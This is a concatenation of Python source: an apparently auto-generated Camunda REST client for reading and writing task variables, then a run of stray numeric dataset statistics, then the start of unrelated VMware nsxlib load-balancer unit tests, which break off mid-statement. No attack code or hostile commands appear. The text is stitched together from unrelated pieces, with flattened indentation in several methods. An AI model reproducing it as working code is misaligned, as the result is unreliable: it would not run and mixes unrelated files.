:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(VariableValueDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
# locals() must be the FIRST statement so it captures exactly the call
# arguments (self, id, var_name, kwargs); do not add locals above it.
local_var_params = locals()
all_params = [
'id',
'var_name',
'deserialize_value'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
# Fold **kwargs into local_var_params, rejecting unknown options.
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_variable" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_task_variable`") # noqa: E501
# verify the required parameter 'var_name' is set
if self.api_client.client_side_validation and ('var_name' not in local_var_params or # noqa: E501
local_var_params['var_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `var_name` when calling `get_task_variable`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'var_name' in local_var_params:
path_params['varName'] = local_var_params['var_name'] # noqa: E501
query_params = []
if 'deserialize_value' in local_var_params and local_var_params['deserialize_value'] is not None: # noqa: E501
query_params.append(('deserializeValue', local_var_params['deserialize_value'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# Dispatch GET /task/{id}/variables/{varName} via the shared ApiClient.
return self.api_client.call_api(
'/task/{id}/variables/{varName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VariableValueDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_variable_binary(self, id, var_name, **kwargs):  # noqa: E501
    """Retrieve a binary variable (byte array or file) from a task's context.

    Applicable for byte array and file variables.  The variable must be
    visible from the task: a local task variable or one declared in a parent
    scope.  Synchronous by default; pass ``async_req=True`` to receive a
    thread whose ``get()`` yields the result.

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to retrieve the variable for. (required)
    :param str var_name: The name of the variable to retrieve. (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             without reading/decoding it. Default is True.
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: file, or the request thread when called asynchronously
    """
    # Delegate to the *_with_http_info variant, forcing it to hand back only
    # the response data (no status code / headers).
    return self.get_task_variable_binary_with_http_info(
        id, var_name, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
# Full-detail variant of get_task_variable_binary: issues the HTTP GET on the
# /data sub-resource and can also return status code and headers.
def get_task_variable_binary_with_http_info(self, id, var_name, **kwargs): # noqa: E501
"""get_task_variable_binary # noqa: E501
Retrieves a binary variable from the context of a given task. Applicable for byte array and file variables. The variable must be visible from the task. It is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variable_binary_with_http_info(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variable for. (required)
:param str var_name: The name of the variable to retrieve. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(file, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
# locals() must be the FIRST statement so it captures exactly the call
# arguments (self, id, var_name, kwargs); do not add locals above it.
local_var_params = locals()
all_params = [
'id',
'var_name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
# Fold **kwargs into local_var_params, rejecting unknown options.
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_variable_binary" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_task_variable_binary`") # noqa: E501
# verify the required parameter 'var_name' is set
if self.api_client.client_side_validation and ('var_name' not in local_var_params or # noqa: E501
local_var_params['var_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `var_name` when calling `get_task_variable_binary`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'var_name' in local_var_params:
path_params['varName'] = local_var_params['var_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/octet-stream', 'text/plain', 'application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# Dispatch GET /task/{id}/variables/{varName}/data via the shared ApiClient.
return self.api_client.call_api(
'/task/{id}/variables/{varName}/data', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_variables(self, id, **kwargs):  # noqa: E501
    """Retrieve all variables visible from a task.

    A variable is visible from the task if it is a local task variable or is
    declared in a parent scope of the task.  Synchronous by default; pass
    ``async_req=True`` to receive a thread whose ``get()`` yields the result.

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to retrieve the variables from. (required)
    :param bool deserialize_value: when True (the default on the server),
        serialized Java variable values are deserialized server-side and
        rendered as JSON; when False they are returned in serialized form.
        Camunda recommends False for non-Java clients.
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             without reading/decoding it. Default is True.
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: dict(str, VariableValueDto), or the request thread when called
             asynchronously
    """
    # Delegate to the *_with_http_info variant, forcing it to hand back only
    # the response data (no status code / headers).
    return self.get_task_variables_with_http_info(
        id, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
# Full-detail variant of get_task_variables: issues the HTTP GET and can
# also return status code and headers, depending on kwargs.
def get_task_variables_with_http_info(self, id, **kwargs): # noqa: E501
"""get_task_variables # noqa: E501
Retrieves all variables visible from the task. A variable is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variables_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variables from. (required)
:param bool deserialize_value: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on the server side (default `true`). If set to `true`, a serializable variable will be deserialized on server side and transformed to JSON using [Jackson's](https://github.com/FasterXML/jackson) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to `false`, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While `true` is the default value for reasons of backward compatibility, we recommend setting this parameter to `false` when developing web applications that are independent of the Java process applications deployed to the engine.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(dict(str, VariableValueDto), status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
# locals() must be the FIRST statement so it captures exactly the call
# arguments (self, id, kwargs); do not add locals above it.
local_var_params = locals()
all_params = [
'id',
'deserialize_value'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
# Fold **kwargs into local_var_params, rejecting unknown options.
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_variables" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_task_variables`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'deserialize_value' in local_var_params and local_var_params['deserialize_value'] is not None: # noqa: E501
query_params.append(('deserializeValue', local_var_params['deserialize_value'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# Dispatch GET /task/{id}/variables via the shared ApiClient.
return self.api_client.call_api(
'/task/{id}/variables', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, VariableValueDto)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_task_variables(self, id, **kwargs):  # noqa: E501
    """Update and/or delete the variables visible from a task.

    Updates precede deletions, so a variable that is both updated and deleted
    ends up deleted.  A variable is visible from the task if it is a local
    task variable or is declared in a parent scope of the task.  Synchronous
    by default; pass ``async_req=True`` to receive a thread whose ``get()``
    yields the result.

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to set variables for. (required)
    :param PatchVariablesDto patch_variables_dto:
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             without reading/decoding it. Default is True.
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: None, or the request thread when called asynchronously
    """
    # Delegate to the *_with_http_info variant, forcing it to hand back only
    # the response data (no status code / headers).
    return self.modify_task_variables_with_http_info(
        id, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def modify_task_variables_with_http_info(self, id, **kwargs):  # noqa: E501
    """modify_task_variables  # noqa: E501

    Updates or deletes the variables visible from the task. Updates precede
    deletions. So, if a variable is updated AND deleted, the deletion
    overrides the update. A variable is visible from the task if it is a
    local task variable or declared in a parent scope of the task. See
    documentation on [visibility of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.modify_task_variables_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to set variables for. (required)
    :param PatchVariablesDto patch_variables_dto:
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot the arguments; this captures 'self', 'id' and the raw
    # 'kwargs' dict, which is flattened into the mapping below.
    local_var_params = locals()
    all_params = [
        'id',
        'patch_variables_dto'
    ]
    # Transport-level options accepted by every generated endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )
    # Reject any keyword argument not declared above, then merge the
    # accepted ones into local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method modify_task_variables" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `modify_task_variables`")  # noqa: E501

    collection_formats = {}

    # URL path placeholders ({id} in the endpoint template).
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The PatchVariablesDto payload, serialized as the request body.
    body_params = None
    if 'patch_variables_dto' in local_var_params:
        body_params = local_var_params['patch_variables_dto']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # Endpoint returns no body (response_type=None) on success.
    return self.api_client.call_api(
        '/task/{id}/variables', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def put_task_variable(self, id, var_name, **kwargs):  # noqa: E501
    """put_task_variable  # noqa: E501

    Updates a process variable that is visible from the Task scope. A
    variable is visible from the task if it is a local task variable, or
    declared in a parent scope of the task. See the documentation on
    [variable scopes and visibility](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables#variable-scopes-and-variable-visibility). **Note**: If a variable doesn't exist, the variable is created in the top-most scope visible from the task. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.put_task_variable(id, var_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to set the variable for. (required)
    :param str var_name: The name of the variable to set. (required)
    :param VariableValueDto variable_value_dto:
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Thin wrapper: force data-only responses and hand off to the
    # full *_with_http_info implementation.
    forwarded_kwargs = dict(kwargs, _return_http_data_only=True)
    return self.put_task_variable_with_http_info(
        id, var_name, **forwarded_kwargs)  # noqa: E501
def put_task_variable_with_http_info(self, id, var_name, **kwargs):  # noqa: E501
    """put_task_variable  # noqa: E501

    Updates a process variable that is visible from the Task scope. A
    variable is visible from the task if it is a local task variable, or
    declared in a parent scope of the task. See the documentation on
    [variable scopes and visibility](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables#variable-scopes-and-variable-visibility). **Note**: If a variable doesn't exist, the variable is created in the top-most scope visible from the task. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.put_task_variable_with_http_info(id, var_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to set the variable for. (required)
    :param str var_name: The name of the variable to set. (required)
    :param VariableValueDto variable_value_dto:
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot the arguments; this captures 'self', 'id', 'var_name' and
    # the raw 'kwargs' dict, which is flattened into the mapping below.
    local_var_params = locals()
    all_params = [
        'id',
        'var_name',
        'variable_value_dto'
    ]
    # Transport-level options accepted by every generated endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )
    # Reject any keyword argument not declared above, then merge the
    # accepted ones into local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method put_task_variable" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `put_task_variable`")  # noqa: E501
    # verify the required parameter 'var_name' is set
    if self.api_client.client_side_validation and ('var_name' not in local_var_params or  # noqa: E501
                                                   local_var_params['var_name'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `var_name` when calling `put_task_variable`")  # noqa: E501

    collection_formats = {}

    # URL path placeholders; note the REST path uses camelCase 'varName'.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501
    if 'var_name' in local_var_params:
        path_params['varName'] = local_var_params['var_name']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The VariableValueDto payload, serialized as the request body.
    body_params = None
    if 'variable_value_dto' in local_var_params:
        body_params = local_var_params['variable_value_dto']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # Endpoint returns no body (response_type=None) on success.
    return self.api_client.call_api(
        '/task/{id}/variables/{varName}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def set_binary_task_variable(self, id, var_name, **kwargs):  # noqa: E501
    """set_binary_task_variable  # noqa: E501

    Sets the serialized value for a binary variable or the binary value
    for a file variable visible from the task. A variable is visible from
    the task if it is a local task variable or declared in a parent scope
    of the task. See documentation on [visibility of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.set_binary_task_variable(id, var_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to retrieve the variable for. (required)
    :param str var_name: The name of the variable to retrieve. (required)
    :param file data: The binary data to be set. For File variables, this multipart can contain the filename, binary value and MIME type of the file variable to be set Only the filename is mandatory.
    :param str value_type: The name of the variable type. Either Bytes for a byte array variable or File for a file variable.
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Thin wrapper: force data-only responses and hand off to the
    # full *_with_http_info implementation.
    forwarded_kwargs = dict(kwargs, _return_http_data_only=True)
    return self.set_binary_task_variable_with_http_info(
        id, var_name, **forwarded_kwargs)  # noqa: E501
def set_binary_task_variable_with_http_info(self, id, var_name, **kwargs):  # noqa: E501
    """set_binary_task_variable  # noqa: E501

    Sets the serialized value for a binary variable or the binary value
    for a file variable visible from the task. A variable is visible from
    the task if it is a local task variable or declared in a parent scope
    of the task. See documentation on [visibility of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.set_binary_task_variable_with_http_info(id, var_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to retrieve the variable for. (required)
    :param str var_name: The name of the variable to retrieve. (required)
    :param file data: The binary data to be set. For File variables, this multipart can contain the filename, binary value and MIME type of the file variable to be set Only the filename is mandatory.
    :param str value_type: The name of the variable type. Either Bytes for a byte array variable or File for a file variable.
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot the arguments; this captures 'self', 'id', 'var_name' and
    # the raw 'kwargs' dict, which is flattened into the mapping below.
    local_var_params = locals()
    all_params = [
        'id',
        'var_name',
        'data',
        'value_type'
    ]
    # Transport-level options accepted by every generated endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )
    # Reject any keyword argument not declared above, then merge the
    # accepted ones into local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method set_binary_task_variable" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `set_binary_task_variable`")  # noqa: E501
    # verify the required parameter 'var_name' is set
    if self.api_client.client_side_validation and ('var_name' not in local_var_params or  # noqa: E501
                                                   local_var_params['var_name'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `var_name` when calling `set_binary_task_variable`")  # noqa: E501

    collection_formats = {}

    # URL path placeholders; note the REST path uses camelCase 'varName'.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501
    if 'var_name' in local_var_params:
        path_params['varName'] = local_var_params['var_name']  # noqa: E501

    query_params = []

    header_params = {}

    # Multipart upload: 'data' travels as a file part, 'value_type' as a
    # regular form field named 'valueType'.
    form_params = []
    local_var_files = {}
    if 'data' in local_var_params:
        local_var_files['data'] = local_var_params['data']  # noqa: E501
    if 'value_type' in local_var_params:
        form_params.append(('valueType', local_var_params['value_type']))  # noqa: E501

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['multipart/form-data'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # Endpoint returns no body (response_type=None) on success.
    return self.api_client.call_api(
        '/task/{id}/variables/{varName}/data', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
| 54.310943
| 923
| 0.624269
| 6,180
| 50,129
| 4.867638
| 0.046926
| 0.0367
| 0.054917
| 0.020943
| 0.969749
| 0.969051
| 0.968453
| 0.966425
| 0.965428
| 0.963932
| 0
| 0.013856
| 0.304614
| 50,129
| 922
| 924
| 54.369848
| 0.849106
| 0.534102
| 0
| 0.748315
| 1
| 0
| 0.177877
| 0.042629
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033708
| false
| 0
| 0.011236
| 0
| 0.078652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fbb680616f5e113ad0cf9e3983e44ae261650b7a
| 85,381
|
py
|
Python
|
vmware_nsxlib/tests/unit/v3/policy/test_lb_resources.py
|
salv-orlando/vmware-nsxlib
|
283eff2881b99c57b3908d03fb1c91da7dbdf46e
|
[
"Apache-2.0"
] | null | null | null |
vmware_nsxlib/tests/unit/v3/policy/test_lb_resources.py
|
salv-orlando/vmware-nsxlib
|
283eff2881b99c57b3908d03fb1c91da7dbdf46e
|
[
"Apache-2.0"
] | null | null | null |
vmware_nsxlib/tests/unit/v3/policy/test_lb_resources.py
|
salv-orlando/vmware-nsxlib
|
283eff2881b99c57b3908d03fb1c91da7dbdf46e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 VMware, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from unittest import mock
from vmware_nsxlib.tests.unit.v3 import nsxlib_testcase
from vmware_nsxlib.tests.unit.v3.policy import test_resources
from vmware_nsxlib.v3 import exceptions as nsxlib_exc
from vmware_nsxlib.v3 import nsx_constants
from vmware_nsxlib.v3.policy import constants
from vmware_nsxlib.v3.policy import lb_defs
TEST_TENANT = 'test'
class TestPolicyLBClientSSLProfileApi(test_resources.NsxPolicyLibTestCase):
    """Tests for the load-balancer client SSL profile policy resource.

    Each test patches the underlying policy API transport and verifies
    that the resource API builds the expected LBClientSslProfileDef.
    """

    def setUp(self, *args, **kwargs):
        """Point resourceApi at the client SSL profile resource."""
        super(TestPolicyLBClientSSLProfileApi, self).setUp()
        self.resourceApi = self.policy_lib.load_balancer.client_ssl_profile

    def test_create_with_id(self):
        """create_or_overwrite with an explicit id returns that id."""
        name = 'd1'
        description = 'desc'
        obj_id = '111'
        protocols = ['TLS_V1_1']
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name,
                client_ssl_profile_id=obj_id,
                description=description,
                protocols=protocols,
                tenant=TEST_TENANT)
            expected_def = lb_defs.LBClientSslProfileDef(
                client_ssl_profile_id=obj_id,
                name=name,
                description=description,
                protocols=protocols,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result)

    def test_create_without_id(self):
        """create_or_overwrite without an id generates one (mock.ANY)."""
        name = 'd1'
        description = 'desc'
        with mock.patch.object(self.policy_api,
                               "create_or_update") as api_call:
            result = self.resourceApi.create_or_overwrite(
                name, description=description,
                tenant=TEST_TENANT)
            expected_def = lb_defs.LBClientSslProfileDef(
                client_ssl_profile_id=mock.ANY,
                name=name,
                description=description,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertIsNotNone(result)

    def test_delete(self):
        """delete builds a def keyed only by profile id and tenant."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "delete") as api_call:
            self.resourceApi.delete(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBClientSslProfileDef(
                client_ssl_profile_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_get(self):
        """get forwards the id and returns the backend result."""
        obj_id = '111'
        with mock.patch.object(self.policy_api, "get",
                               return_value={'id': obj_id}) as api_call:
            result = self.resourceApi.get(obj_id, tenant=TEST_TENANT)
            expected_def = lb_defs.LBClientSslProfileDef(
                client_ssl_profile_id=obj_id,
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual(obj_id, result['id'])

    def test_get_by_name(self):
        """get_by_name lists profiles and matches on display_name."""
        name = 'd1'
        with mock.patch.object(
            self.policy_api, "list",
            return_value={'results': [{'display_name': name}]}) as api_call:
            obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
            self.assertIsNotNone(obj)
            expected_def = lb_defs.LBClientSslProfileDef(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_list(self):
        """list with no results returns an empty list."""
        with mock.patch.object(self.policy_api, "list",
                               return_value={'results': []}) as api_call:
            result = self.resourceApi.list(tenant=TEST_TENANT)
            expected_def = lb_defs.LBClientSslProfileDef(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual([], result)

    def test_update(self):
        """update merges new name/description into the existing profile."""
        obj_id = '111'
        name = 'new name'
        description = 'new desc'
        with self.mock_get(obj_id, name), \
            self.mock_create_update() as update_call:
            self.resourceApi.update(obj_id,
                                    name=name,
                                    description=description,
                                    tenant=TEST_TENANT)
            expected_def = lb_defs.LBClientSslProfileDef(
